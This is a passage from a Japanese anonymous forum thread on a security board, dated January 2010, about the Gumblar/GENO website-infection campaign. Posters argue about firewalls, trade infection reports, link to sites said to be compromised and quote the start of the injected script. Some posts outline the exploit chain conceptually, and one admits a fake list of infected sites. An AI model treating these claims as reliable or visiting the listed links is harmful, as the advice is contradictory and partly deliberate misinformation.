ファイルを実行しちゃう時点で駄目だけど
235:名無しさん@お腹いっぱい。
10/01/03 22:22:12
FTPアカウントを攻撃者に送る通信って、何番のポートで行われる?
これが80番や443番とかじゃなければ、アウトバウンド通信の制御をしてれば
ある程度防げそう。
236:名無しさん@お腹いっぱい。
10/01/03 22:23:50
だから制御なんて考えなくてもポップアップされるって
あくまでも今のところな
237:名無しさん@お腹いっぱい。
10/01/03 22:25:36
防げれない。
238:名無しさん@お腹いっぱい。
10/01/03 22:28:25
>>234
単純だからアンチウイルスも検出しにくいって言うのもあるね
239:名無しさん@お腹いっぱい。
10/01/03 22:39:11
脆弱性を突かれしまったらアンチウイルスもFWも全くの無力
ここの連中どんだけ呑気なんだよwww
240:名無しさん@お腹いっぱい。
10/01/03 22:49:15
しつけえな
241:名無しさん@お腹いっぱい。
10/01/03 22:51:50
悔しいから嘘まき散らしてるんだろ
べつに争ってるわけじぇねえんだからやめろよ
242:名無しさん@お腹いっぱい。
10/01/03 22:59:31
脆弱性突かれてもFW入れていれば情報は漏れない・・・ぷぷぷ
嘘の情報流すのはよせよ
243:名無しさん@お腹いっぱい。
10/01/03 23:00:19
FW云々は
事前に感染を防げるかと
感染後の被害を防げるかで
話が噛み合ってない気がする
244:名無しさん@お腹いっぱい。
10/01/03 23:08:15
要は0-dayをどうやって防ぐかってことだろ
Adobe Reader使わなきゃいいんじゃね
245:名無しさん@お腹いっぱい。
10/01/03 23:09:08
>>243
話はかみ合ってないが
漏れてないと思うね
246:名無しさん@お腹いっぱい。
10/01/03 23:11:26
>>244
もちろん脆弱性をふさぐのは基本だけどね
たとえ脆弱性残したままだったとしても
FWがあればこの攻撃に気づくってだけの話
247:名無しさん@お腹いっぱい。
10/01/03 23:16:01
誰もFWで感染が防げるとか言ってない
一人勘違いしてるみたいだが
同じような人がいるかも知れないから勘違いしないようにね
248:名無しさん@お腹いっぱい。
10/01/03 23:21:38
実際は性能の良いHIPSがあるFWなら防げるけどね
249:名無しさん@お腹いっぱい。
10/01/03 23:25:32
>>242
こいつはなんにも分かってない
脆弱性も分かってない
250:名無しさん@お腹いっぱい。
10/01/03 23:32:21
snortとかに検知ルールがりがり書けばええねん
251:名無しさん@お腹いっぱい。
10/01/03 23:34:10
adobeなんで0DAY長期間放置してるんだ?
252:名無しさん@お腹いっぱい。
10/01/03 23:38:11
adobeに関してははっきりと告知すべきだよな
ほとんどの人は知らないんじゃないか
253:名無しさん@お腹いっぱい。
10/01/03 23:39:39
データ抜いて外部に流すタイプならいいけど
システムやファイル破壊するタイプとか出たら
FWじゃどうしようも無いからなぁ
254:名無しさん@お腹いっぱい。
10/01/03 23:39:48
少なくともカスペは駄目だった
URLリンク(oshiete1.goo.ne.jp)
255:名無しさん@お腹いっぱい。
10/01/03 23:42:36
>>252
お前だけだそんなこと思ってるやつ
自分で情強とか思ってるだろ
256:名無しさん@お腹いっぱい。
10/01/03 23:43:07
>>252
FlashPlayer更新してない人も世間的に結構居るんでね?
どこそこの動画サイトで不具合出るから古いのに戻したとかも居そう
257:名無しさん@お腹いっぱい。
10/01/03 23:45:11
>>256
お前だけだそんなこと思ってるやつ
自分で情強とか思ってるだろ
258:名無しさん@お腹いっぱい。
10/01/03 23:45:23
>>255
そんなこと思うわけねえだろ
頭大丈夫かよ
情報が行き届いてないから感染するんだろ
馬鹿め
259:名無しさん@お腹いっぱい。
10/01/03 23:46:12
>>255
おまえそんなに悔しいのかよ
260:名無しさん@お腹いっぱい。
10/01/03 23:46:40
>>258
自分で情強とか思ってるだろ
261:名無しさん@お腹いっぱい。
10/01/03 23:47:34
>>259
おまえそんなに悔しいのかよ
262:名無しさん@お腹いっぱい。
10/01/03 23:47:37
>>260
なんだよ情強って?
日本語で書いてくれよ
263:名無しさん@お腹いっぱい。
10/01/03 23:48:24
>>262
おまえそんなに悔しいのかよ
264:名無しさん@お腹いっぱい。
10/01/03 23:48:52
悔しくても荒らすなよ
だいたいなんでそんなに悔しいがるんだよ
勘違いしてるんじゃないか
265:名無しさん@お腹いっぱい。
10/01/03 23:51:57
>>254
かわいそうに悔しくても荒らすなよ
だいたいなんでそんなに悔しいがるんだよ www
266:名無しさん@お腹いっぱい。
10/01/03 23:53:15
ファイアウォールやアンチウイルスの設定書き換えちゃったりは無いの?
267:名無しさん@お腹いっぱい。
10/01/03 23:56:39
>>266
今のところ無許可で書き換えはないと思う
最近のは保護機能があるのも多いしね
268:名無しさん@お腹いっぱい。
10/01/04 00:10:49
URLリンク(oshiete1.goo.ne.jp)
自分も初期のGENOウイルスでカスペルスキーで感染しました。
良くHIPSやプロアクティブの事を言われる方を見受けますが実際は
GENOウイルスには全く役に立ちませんでした、
そのGENOで4月末から5月初旬まで非常に困った経験者です。
初期のものはカスペルスキーでも反応はするのですが阻止できませんでした。
前バージョンの7.0をWin2000で使っていましたが、アドビリーダーの5と9を
両方混在させていたのが失敗でした。
IE6、ファイヤーフォックス3でのグーグルツールバーに細工をしてしまい、
何を検索しても、海外の謎の黒バックに青文字のサイトが表示されてしまいました。
次に出たバージョンでは、なにを検索しても404Not Foundと表示されて、
(404にも色々なバージョンがありました。)実は表示自体がウソで他のサイトに
さらにアクセスさせようとしていました。何かの送信が止まらない、ネットワークの
切断出来ない。IPアドレスの解放と再収得が出来ない。なんだこれは。といった
状態で、ブチ。とLANケーブルを引っこ抜きました。
269:名無しさん@お腹いっぱい。
10/01/04 00:16:51
>>267
どうもです
取り敢えず安心できそう
270:名無しさん@お腹いっぱい。
10/01/04 00:25:11
ていうかこれもうGENOと呼ぶには違うんじゃね
JREって呼ぼうぜw
271:名無しさん@お腹いっぱい。
10/01/04 00:42:25
>>243
実際>>159で試したところ
FWで最初に確認できるアクセス以前での情報流出は確認できない
あくまでもそのサイトでってことだけどね
272:名無しさん@お腹いっぱい。
10/01/04 03:19:13
URLリンク(imepita.jp)
私のPCが起動するとこんな風になるようになったんですが、
これはこのスレのウイルスに該当しているんですかね?
ちなみにOSはvistaで、
この画像の状態は起動して、
ロゴマークがでて、ユーザーログインしてからの状態です。
273:名無しさん@お腹いっぱい。
10/01/04 03:21:56
矢印のアイコン出て固まる感じ?なら、そうだよ。
274:名無しさん@お腹いっぱい。
10/01/04 03:31:31
カーソルは動くんです
でも背景が真っ暗で、下のスタートのバー?所が真っ白になってます。
真っ白な所に合わせると、矢印から砂時計になります。
この画面から何も操作できないです。
どうすれば復旧できますか?
甘えかも知れませんが、教えていただけるとありがたいです。
275:名無しさん@お腹いっぱい。
10/01/04 06:20:38
>>268
>自分も初期のGENOウイルスでカスペルスキーで感染しました。
>良くHIPSやプロアクティブの事を言われる方を見受けますが
>実際はGENOウイルスには全く役に立ちませんでした、
カスペルスキーの無力ぶりにワロタwww
276:名無しさん@お腹いっぱい。
10/01/04 07:43:59
たかが個人向けの有料あるいは乞食版FWのログを見て無理やり
安心しようとしているところが笑えるスレですね
回避されてるんじゃぁあって思わないのかね
でなきゃこんだけ広がるのはおかしいでしょ
277:名無しさん@お腹いっぱい。
10/01/04 08:10:45
>>276
こういうスレ見てる奴はまあいいんだよ
問題なのはPCに使われてる(笑)一般人
GumblarとかGENOとか知ってる?て聞いても「なにそれ」で終わる
もちろんセキュリティソフトなんて入れてないし、入れようともしない
家電感覚でPC買ってる奴はこんなんばっかりだな
278:名無しさん@お腹いっぱい。
10/01/04 08:13:43
>>276
ほんとしつこいね
その程度の人はお前だけだよ
279:名無しさん@お腹いっぱい。
10/01/04 08:27:36
>>278
ほんとしつこいね
その程度の人はお前だけだよ
280:名無しさん@お腹いっぱい。
10/01/04 08:29:20
たしかに>>278が一番バカっぽいwww
281:名無しさん@お腹いっぱい。
10/01/04 08:30:29
しつこい阿呆のために説明すると
脆弱性を利用してpdfupd.exeがダウンロードされ実行される
トロイ本体が解凍され実行される
ここで通信が行われるからすぐ分かるって話なんだよ
異変に気づけば何らかの対処ができるだろうってこと
282:名無しさん@お腹いっぱい。
10/01/04 08:30:43
一番バカっぽいのは>>278で決まりですね!!!
283:名無しさん@お腹いっぱい。
10/01/04 08:32:02
それでも分からないなら自分で試せ
これでおしまいにしてくれよ
284:名無しさん@お腹いっぱい。
10/01/04 08:33:08
よほど悔しかったみたいだなw
285:名無しさん@お腹いっぱい。
10/01/04 08:35:16
>>281
で、どこのFWなら分かって、どこのFWなら分からないの?
286:名無しさん@お腹いっぱい。
10/01/04 08:44:35
外向きの通信が発生したとき分かるようなソフトならどれでも良いだろ
分からないFWは外向き通信を監視しないやつやそう設定してる場合
具体的にと言うなら俺はOutpostを使ってる
もちろんその他のソフトでも問題ない
287:名無しさん@お腹いっぱい。
10/01/04 08:59:26
アウポなら大丈夫かもしれんけど、そんなもん普通使ってないから
288:名無しさん@お腹いっぱい。
10/01/04 11:30:31
海外からのFTP接続を拒否れば書き変えは不可能ってことでOK?
289:名無しさん@お腹いっぱい。
10/01/04 11:37:57
そんな設定レン鯖で出来るんか?
290:名無しさん@お腹いっぱい。
10/01/04 12:00:36
普通のレン鯖じゃ無理だろうね
291:名無しさん@お腹いっぱい。
10/01/04 12:05:59
>>274
>>4
テンプレ見てないんじゃ甘えだろ
感染前のレジストリに戻せば直るかもな
292:名無しさん@お腹いっぱい。
10/01/04 17:08:49
年末に感染サイト踏んで、今日までPCオフで様子見。ようやくFTP起動させてサイトのデータDL
数分待って自サイトソース確認するも改ざん現れず
何故生き残ったのか、自分でも分からん
XP(昨年11月以降未うp立て)、IE6(ジャバスクオン)
adobeリーダーのジャバスクは切ってあったが、これが命綱だったのか?
293:名無しさん@お腹いっぱい。
10/01/04 18:23:09
年末にadobeらしきアップデートが出てきてPCがクラッシュしたとか言い出したのが社内にいて
そいつに教えておいたFTPアカウント全部書きかえられてたわ
294:名無しさん@お腹いっぱい。
10/01/04 18:25:36
陥落サイトを掘ってみた。
URLリンク(kyu-ta)<)●sakura●ne●jp/nekkei080401●mht
URLリンク(blog)<)●blog3●fc2●com/
URLリンク(blog3)<)●s10●xrea●com/
※~~xrea.comは全滅っぽい気がする
tp//lists●sourceforge●jp/mailman/archives/slashdotjp-dev/
URLリンク(www)●aoki●ecei●tohoku●ac●jp/topic/RSNA_press_release/HealthImaging_com●mht
妙なとこだけ改竄されてるし
295:名無しさん@お腹いっぱい。
10/01/04 18:34:34
gumblar.cn/が復活してるね
↓
URLリンク(www.google.com)
Google が最後にこのサイトを巡回したのは2010-01-03で、
このサイトで不審なコンテンツが最後に検出されたのは2010-01-03です。
296:名無しさん@お腹いっぱい。
10/01/04 19:16:37
>>294
教えてやれよ
297:名無しさん@お腹いっぱい。
10/01/04 20:54:55
>>296
294じゃないけど、fc2の方にメールを送ろうと思ったら
IDを持っていないとそもそも相手にしてくれないようなので
メールすら送れない・送り先が分からない。
こういうので個人あてにメールを送っても返信が来た試しがない。
298:名無しさん@お腹いっぱい。
10/01/04 20:55:09
>>294
どこもやられてないじゃん。
お前さんのキャッシュに妙な物が追記されるなら、お前さんが感染してるんじゃね。
299:名無しさん@お腹いっぱい。
10/01/04 21:05:16
>>298
確かに仮想機(うぃんXP2)で踏んでみても何も起こらない・・・
300:名無しさん@お腹いっぱい。
10/01/04 21:24:38
>>294
新手の宣伝か?(笑)
301:名無しさん@お腹いっぱい。
10/01/04 22:11:49
Trojan.Injectに感染した >>294 が居ると聞いて
302:名無しさん@お腹いっぱい。
10/01/04 22:53:39
モロゾフの公式サイトでトロイ配布中
スレリンク(news板)
303:名無しさん@お腹いっぱい。
10/01/04 23:03:25
GNU GPLの8080ですな。
304:名無しさん@お腹いっぱい。
10/01/04 23:08:20
PDigiiEPG.exeだと!?
305:294
10/01/04 23:22:08
>>298-299
釣ってすまなかったが、
感染してないという検証ありがとう。
【8080チェッカー】
URLリンク(www12.atpages.jp)
↑↑↑
ザル&誤検出過多という事が証明されたよw
306:名無しさん@お腹いっぱい。
10/01/04 23:38:33
ザルは仕方ないとしても、語検出もするのかよw
307:名無しさん@お腹いっぱい。
10/01/05 00:31:40
>>292
数分じゃわからんよ
308:名無しさん@お腹いっぱい。
10/01/05 00:32:45
どうやらこのスレは釣り堀化してるな(笑)
309:名無しさん@お腹いっぱい。
10/01/05 00:33:50
アホが釣れた
310:名無しさん@お腹いっぱい。
10/01/05 00:34:58
>>1-999
本スレはこっちですよ。
GENOウイルススレ ★23
スレリンク(sec板)
311:名無しさん@お腹いっぱい。
10/01/05 00:38:46
>>302
に飛んだらNODが反応したんだけど大丈夫かよ
312:名無しさん@お腹いっぱい。
10/01/05 00:39:48
反応したんだから大丈夫だろ
モロゾフで急に騒がしくなったな
313:名無しさん@お腹いっぱい。
10/01/05 00:40:08
コードそのまま貼った奴がいるからな
314:名無しさん@お腹いっぱい。
10/01/05 00:40:09
何故毎度毎度ソースの見方も知らないくせに、あほなチェッカーを信用して
騒ぎ立てるバカが発生するのか
しかもわざわざセキュ板覗いてる程なのに
315:名無しさん@お腹いっぱい。
10/01/05 00:42:32
>>314
色んなやつがいるから仕方ない
316:名無しさん@お腹いっぱい。
10/01/05 00:58:25
モロゾフ
URLリンク(www.virustotal.com)
317:名無しさん@お腹いっぱい。
10/01/05 00:59:35
今更もう良いよ
ずっとその話してるのに
318:名無しさん@お腹いっぱい。
10/01/05 01:17:10
モロゾフ、アウト~
319:名無しさん@お腹いっぱい。
10/01/05 01:21:44
こんどはモロゾフか
いちおう、MicrosoftのSmartScreenと、ゴーグルのセーフブラウジングとやらに
モロゾフ報告したけど、いまだに変化なし
320:名無しさん@お腹いっぱい。
10/01/05 02:29:25
>>314
チェッカーの性能がわかったじゃないかw
321:名無しさん@お腹いっぱい。
10/01/05 03:13:55
URLリンク(127.0.0.1)にアクセスで感染確認ってできる?
322:名無しさん@お腹いっぱい。
10/01/05 03:23:06
無理
323:名無しさん@お腹いっぱい。
10/01/05 09:54:58
>>307
一晩たったが大丈夫そうだ
やっぱReaderのジャバスク切ってたのが効いたらしい。今では大抵のベンダーが検出できるっぽいし、漸く一安心だ
324:sage ◆sage/xLnlI
10/01/05 15:16:29
>>76
踏んじゃった
でもnorton先生が止めてくれた
325:名無しさん@お腹いっぱい。
10/01/05 16:26:02
何かうちのport2049から某RSSサーバにやたらリクエストが送られてるんだが、このウィルス?
326:名無しさん@お腹いっぱい。
10/01/05 17:04:33
ブラウザのRSS機能なんじゃね?
327:名無しさん@お腹いっぱい。
10/01/05 17:17:53
そこまでわかっててGeno疑うってどういう知識の偏り方なのか疑問だ
328:名無しさん@お腹いっぱい。
10/01/05 17:34:35
ヤフートップキタ━━(゚∀゚)━━!!!!
329:名無しさん@お腹いっぱい。
10/01/05 19:19:24
今日の夕刊読売新聞ガンブラー記事一面
ホンダもやられてたのね
330:名無しさん@お腹いっぱい。
10/01/05 19:43:16
>ホンダもやられてたのね
何をいまさら…。
JR東日本 URLリンク(www.jreast.co.jp)
本田技研 URLリンク(www.honda.co.jp)
モロゾフ URLリンク(www.morozoff.co.jp)
信越放送 URLリンク(www.sbc21.co.jp)
デジタルマガジン URLリンク(digimaga.net)
アニたまどっとコム(ラジオ関西) 告知消失
331:名無しさん@お腹いっぱい。
10/01/05 23:02:13
エロサイト徘徊している俺は確実にアウトなんだろうな・・・・・・
AVGフリー、Ad-Aware、spybotしか使っていない俺はどうしたらいいのでしょうか?
332:名無しさん@お腹いっぱい。
10/01/05 23:24:03
AVGフリーでも反応するぞ
333:名無しさん@お腹いっぱい。
10/01/05 23:35:19
精度は決して高くはないがフリーならまだavastの方がいいぞ
334:名無しさん@お腹いっぱい。
10/01/05 23:46:07
蔓延具合やばいな
次は辻ブログか
どこまで感染が広まるやら
335:名無しさん@お腹いっぱい。
10/01/05 23:58:58
win.jpgって63バイトなんだけど、
これで感染させることができるの?
336:名無しさん@お腹いっぱい。
10/01/06 00:28:27
エスパーさんは先程お眠りになられました
337:名無しさん@お腹いっぱい。
10/01/06 02:21:35
>>335
無理。つかwin.jpgは関係ない。
338:名無しさん@お腹いっぱい。
10/01/06 02:47:02
嘘言うなよ
分からないなら黙ってろ
339:名無しさん@お腹いっぱい。
10/01/06 03:15:52
/*GNU GPL*/のスクリプト解読してみたけどさ
解読して出てきたURL先のものをjavascriptだぞと
というのは記述してるわけ
で今のウィルスってjavascriptで読み込ませたとしても
悪さするプログラムって実行できるわけ?
そもそも勝手なプログラムの実行はvistaだと防げるわけだし
やっぱりアドビの0-dayでアップデートに紛れ込んで
FTPを盗むプログラムを実行したと思われる
だから今のところ/*GNU GPL*/のスクリプト読んでも無害なんじゃね
詳しい人どう思う?
340:名無しさん@お腹いっぱい。
10/01/06 03:18:45
>>334
頭のjsがやられてるからハロプロ全体のような希ガス
URLリンク(knnn4321)●chips●jp/js/prototype●js
↓
/*GNU GPL*/ try{window.onload
341:名無しさん@お腹いっぱい。
10/01/06 03:22:02
>悪さするプログラムって実行できるわけ?
それが出来ちゃう脆弱性を利用してるわけ
vistaでも実行は可能だがUACオンだとスタートアップに登録可能かどうかは知らない
342:名無しさん@お腹いっぱい。
10/01/06 03:24:46
それに例えスタートアップに登録できなくても
実行できちゃえば
再起動までは攻撃は有効だと思う
343:名無しさん@お腹いっぱい。
10/01/06 03:26:03
>>339
というか基本的なことを分かってない
このスレ読んだだけでももう少し分かるだろ
344:名無しさん@お腹いっぱい。
10/01/06 03:35:39
>>339
何度も言われていると思うが
モロゾフのやつは
Microsoft Video ActiveX コントロールの脆弱性
Adobe Reader/Acrobatの脆弱性
Sun Javaの脆弱性
の三つの脆弱性のどれかが使われる
345:名無しさん@お腹いっぱい。
10/01/06 03:46:29
つまり/*GNU GPL*/を読み込むと
Microsoft Video ActiveX コントロールの脆弱性
Adobe Reader/Acrobatの脆弱性
Sun Javaの脆弱性
このどれかをついてプログラムが実行されちゃうってこと?
346:名無しさん@お腹いっぱい。
10/01/06 03:48:34
そういうこと
347:名無しさん@お腹いっぱい。
10/01/06 05:27:59
>>335,337
win.jpgは脆弱性を突いてクラッシュさせるのが役目で、そいつだけじゃ感染しない。
そいつを読み込ませるJavaScript側でshellコードを生成し、メモリー内にまき散らしておいて
クラッシュ -> shellコード実行 -> ウイルス本体召喚 -> ざまあ!
348:名無しさん@お腹いっぱい。
10/01/06 09:31:04
ってかさ、AVG、Avast、MSEssentialsって入れると互いに競合しないの?
一時のAd-AwareとSpyBotみたいに
ウイルスソフトって入れまくってもいいの?
349:名無しさん@お腹いっぱい。
10/01/06 09:37:53
Avast+MSEは競合しないよ
スレリンク(sec板:357-375番)
350:名無しさん@お腹いっぱい。
10/01/06 10:09:14
俺AVGツールバーってのインストールしてるんだけど、これの安全性:完全ってサイト使ってれば大丈夫なんだろうか?
今回のGumblarってXXSだろうけど、となるとツールバーに危険と表示される間もなくホンダなどのサイトでは安全性:完全ってなるんだろうか?
ホンダとか感染したサイト行く勇気は無いんですが、このツールバーでGumblarを予防できるものなんでしょうか?
もし出来なきゃこのツールバーなんの意味があるのかなと思ったりもしますが・・・